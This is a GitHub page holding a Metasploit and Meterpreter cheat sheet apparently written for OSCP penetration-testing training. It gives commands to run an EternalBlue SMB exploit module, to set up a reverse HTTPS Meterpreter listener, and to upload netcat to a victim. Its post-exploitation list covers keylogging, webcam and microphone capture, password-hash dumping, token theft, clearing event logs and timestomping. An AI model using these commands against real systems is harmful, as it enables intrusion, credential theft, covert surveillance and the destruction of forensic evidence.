forked from OlivierLaflamme/Cheatsheet-God
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCheatsheet_Metasploit&Meterpreter.txt
249 lines (176 loc) · 7.22 KB
/
Cheatsheet_Metasploit&Meterpreter.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
See [*Metasploit Unleashed Course*](https://www.offensive-security.com/metasploit-unleashed/)
Search for exploits using Metasploit GitHub framework source code:
[*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
`systemctl start postgresql`
To enable Postgresql on startup
`systemctl enable postgresql`
MSF Syntax
Start metasploit
`msfconsole `
`msfconsole -q`
Show help for command
`show -h`
Show Auxiliary modules
`show auxiliary`
Use a module
`use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass`
Show the basic information for a module
`info`
Show the configuration parameters for a module
`show options`
Set options for a module
`set RHOSTS 192.168.1.1-254
set THREADS 10`
Run the module
`run`
Execute an Exploit
`exploit`
Search for a module
`search type:auxiliary login`
Metasploit Database Access
Show all hosts discovered in the MSF database
`hosts`
Scan for hosts and store them in the MSF database
`db_nmap`
Search machines for specific ports in MSF database
`services -p 443`
Leverage MSF database to scan SMB ports (auto-completed rhosts)
`services -p 443 --rhosts`
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
`dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit`
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
`use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run`
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
`sysinfo`
Get user id from Meterpreter Shell
`getuid`
Search for a file
`search -f *pass*.txt`
Upload a file
`upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
Download a file
`download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
Invoke a command shell from Meterpreter Shell
`shell`
Exit the meterpreter shell
`exit`
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse\_https\_meterpreter
`payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/`
Building Your Own MSF Module
`mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rb`
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
- `download` Download a file or directory
`upload` Upload a file or directory
`portfwd` Forward a local port to a remote service
`route` View and modify the routing table
`keyscan_start` Start capturing keystrokes
`keyscan_stop` Stop capturing keystrokes
`screenshot` Grab a screenshot of the interactive desktop
`record_mic` Record audio from the default microphone for X seconds
`webcam_snap` Take a snapshot from the specified webcam
`getsystem` Attempt to elevate your privilege to that of local system.
`hashdump` Dumps the contents of the SAM database
---------------------------------------------------------------------------------------------------------------
CORE COMMANDS
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
FILE SYSTEM COMMANDS
cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim
NETWORK COMMANDS
ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table
SYSTEM COMMANDS
clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
User Interface Commands
enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components
PRIVILAGE ESCALATION COMMANDS
getsystem - uses 15 built-in methods to gain sysadmin privileges
PASSWORD DUMP COMMAND
hashdump - grabs the hashes in the password (SAM) file
TIMESTOMP COMMAND
timestomp - manipulates the modify, access, and create attributes of a file